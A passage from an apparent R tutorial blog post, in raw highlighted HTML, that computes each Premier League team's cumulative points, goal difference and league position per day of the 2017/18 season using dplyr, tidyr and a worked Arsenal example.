&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Joining, by = c(&amp;#34;Date&amp;#34;, &amp;#34;Team&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[is.na&lt;/span&gt;(prem_points)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now all we need to do is calculate the cumulative points for each team on each day over the course of the season&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Team) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Points &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cumsum&lt;/span&gt;(Points)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So, for example, for &lt;code&gt;Arsenal&lt;/code&gt;, the data now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_points &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arsenal&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 105 x 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date Team Points&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-13 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-19 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-20 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-21 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 2017-08-26 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 2017-08-27 Arsenal 3&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 2017-09-09 Arsenal 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 2017-09-10 Arsenal 6&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 95 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We have a row for each day there was a premier league match, even if that team didn&amp;rsquo;t play. Here you can see Arsenal won on the first day of the season (they beat Leicester 4-3) and didn&amp;rsquo;t gather any more points until they won again on the 9th of September.&lt;/p&gt;
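&lt;p&gt;If the for loop bothers you, here is one possible loop-free sketch of the same idea. It is not the approach used in this post. It assumes a version of {tidyr} recent enough to have &lt;code&gt;pivot_longer()&lt;/code&gt; and &lt;code&gt;complete()&lt;/code&gt;, and it runs on three made-up matches between hypothetical teams &amp;ldquo;A&amp;rdquo;, &amp;ldquo;B&amp;rdquo; and &amp;ldquo;C&amp;rdquo; rather than the real data. The names &lt;code&gt;matches&lt;/code&gt;, &lt;code&gt;points_long&lt;/code&gt;, &lt;code&gt;points_cum&lt;/code&gt; and &lt;code&gt;Venue&lt;/code&gt; are invented for the example&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&#34;dplyr&#34;)
library(&#34;tidyr&#34;)

# Made-up results for three hypothetical teams (not the real data)
matches = tibble(
  Date = as.Date(c(&#34;2017-08-11&#34;, &#34;2017-08-12&#34;, &#34;2017-08-19&#34;)),
  HomeTeam = c(&#34;A&#34;, &#34;B&#34;, &#34;C&#34;),
  AwayTeam = c(&#34;B&#34;, &#34;C&#34;, &#34;A&#34;),
  FTR = c(&#34;H&#34;, &#34;D&#34;, &#34;A&#34;)
)

# One row per team per match, with the points worked out without a loop
points_long = matches %&gt;%
  pivot_longer(c(HomeTeam, AwayTeam),
               names_to = &#34;Venue&#34;, values_to = &#34;Team&#34;) %&gt;%
  mutate(Points = case_when(
    FTR == &#34;D&#34; ~ 1,                             # a draw: 1 point each
    FTR == &#34;H&#34; &amp; Venue == &#34;HomeTeam&#34; ~ 3,  # home win
    FTR == &#34;A&#34; &amp; Venue == &#34;AwayTeam&#34; ~ 3,  # away win
    TRUE ~ 0                                    # the losing side
  )) %&gt;%
  select(Date, Team, Points)

# Add a zero-point row for every team on every match day,
# then accumulate the points for each team through the season
points_cum = points_long %&gt;%
  complete(Date, Team, fill = list(Points = 0)) %&gt;%
  group_by(Team) %&gt;%
  arrange(Date) %&gt;%
  mutate(Points = cumsum(Points)) %&gt;%
  ungroup()

points_cum %&gt;%
  filter(Team == &#34;A&#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Here &lt;code&gt;complete()&lt;/code&gt; stands in for the empty data set, the join and the &lt;code&gt;NA&lt;/code&gt; replacement, so team &amp;ldquo;A&amp;rdquo; still gets a row on the day it didn&amp;rsquo;t play.&lt;/p&gt;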
&lt;h2 id="cumulative-goal-difference-per-team-per-day"&gt;Cumulative goal difference per team per day&lt;/h2&gt;
&lt;p&gt;We’re going to follow the exact same process to do this job. So let’s start by overwriting those columns of points in &lt;code&gt;prem&lt;/code&gt; with columns of &lt;code&gt;NA&lt;/code&gt;’s ready for the goal difference&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[sort&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam))] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, using a for loop again (again, I’m sorry), for each home team and away team we calculate the goal difference by simply subtracting the away team goals from the home team goals, or vice versa.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;for&lt;/span&gt;(i &lt;span style="color:#ff7b72"&gt;in&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;nrow&lt;/span&gt;(prem)){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;HomeTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTHG[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTAG[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prem[i, prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;AwayTeam[i]] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTAG[i] &lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt; prem&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;FTHG[i]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(prem)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 6 x 26&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date HomeTeam AwayTeam FTHG FTAG FTR Arsenal Bournemouth&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;int&amp;gt; &amp;lt;int&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal Leicest… 4 3 H 1 NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Brighton Man City 0 2 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-12 Chelsea Burnley 2 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-12 Crystal… Hudders… 0 3 A NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-12 Everton Stoke 1 0 H NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-12 Southam… Swansea 0 0 D NA NA&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 18 more variables:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can see that where Arsenal beat Leicester 4-3, instead of having a 3 in the &lt;code&gt;Arsenal&lt;/code&gt; variable, we now have a 1 to signify Arsenal won by 1 goal. Now we follow the same process as before: we gather the data into long format, join with the empty data set of days, turn the &lt;code&gt;NA&lt;/code&gt;s into 0’s and then calculate the cumulative goal difference over the season.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;gather&lt;/span&gt;(Team, GD, Arsenal&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;`West Ham`) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(Date, Team, GD) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;(GD)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(empty, prem_gd)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Joining, by = c(&amp;#34;Date&amp;#34;, &amp;#34;Team&amp;#34;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd&lt;span style="color:#d2a8ff;font-weight:bold"&gt;[is.na&lt;/span&gt;(prem_gd)] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_gd &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Team) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(GD &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;cumsum&lt;/span&gt;(GD)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we need to join the two data sets!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;left_join&lt;/span&gt;(prem_points, prem_gd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;## Joining, by = c(&amp;#34;Date&amp;#34;, &amp;#34;Team&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Again using Arsenal as the example team, the data now looks like this&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(Team &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Arsenal&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(Date)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # A tibble: 105 x 4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Date Team Points GD&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &amp;lt;date&amp;gt; &amp;lt;chr&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 1 2017-08-11 Arsenal 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 2 2017-08-12 Arsenal 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 3 2017-08-13 Arsenal 3 1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 4 2017-08-19 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 5 2017-08-20 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 6 2017-08-21 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 7 2017-08-26 Arsenal 3 0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 8 2017-08-27 Arsenal 3 -4&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 9 2017-09-09 Arsenal 6 -1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## 10 2017-09-10 Arsenal 6 -1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## # ... with 95 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now we can see not only when Arsenal picked up points, but when they dropped points as well. For example, on the 27th of August they were beaten by 4 goals, as their goal difference shifted from 0 to -4.&lt;/p&gt;
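&lt;p&gt;To see why filling the gaps with zero and then taking a cumulative sum gives a running goal difference, here is a minimal sketch on a toy tibble. The four rows and the names &lt;code&gt;toy&lt;/code&gt; and &lt;code&gt;toy_running&lt;/code&gt; are hypothetical, chosen only to mirror the Arsenal output above, and &lt;code&gt;coalesce()&lt;/code&gt; is used here as a stand-in for the &lt;code&gt;is.na()&lt;/code&gt; assignment from earlier.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(&amp;#34;dplyr&amp;#34;)

# Hypothetical data: goal difference per day, NA on days without a match
toy = tibble(
  Date = as.Date(c(&amp;#34;2017-08-11&amp;#34;, &amp;#34;2017-08-12&amp;#34;, &amp;#34;2017-08-19&amp;#34;, &amp;#34;2017-08-27&amp;#34;)),
  Team = &amp;#34;Arsenal&amp;#34;,
  GD = c(1, NA, -1, -4)
)

toy_running = toy %&amp;gt;%
  mutate(GD = coalesce(GD, 0)) %&amp;gt;% # no match that day, so nothing is added
  group_by(Team) %&amp;gt;%
  arrange(Date) %&amp;gt;%
  mutate(GD = cumsum(GD)) %&amp;gt;% # running total per team
  ungroup()

toy_running$GD
## [1]  1  1  0 -4
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;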
&lt;p&gt;We’re not done there! For the gif, we want to be able to display the current status of each team on each day, i.e. Champions League (4th or above), Europa League (5th - 7th), Top Half (8th - 10th), Bottom Half (11th - 17th) or Relegation Zone (18th or below). To do this, on each day, we first need to retrieve the order of the teams based on their points and goal difference:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; prem_total &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(Date) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(Points), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;desc&lt;/span&gt;(GD)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(Position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;row_number&lt;/span&gt;()) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ungroup&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;After that, we can quite easily calculate their position status using our own function, and a bit of {purrr}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Qual &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(x){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Champions League&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Europa League&amp;#34;&lt;/span&gt;
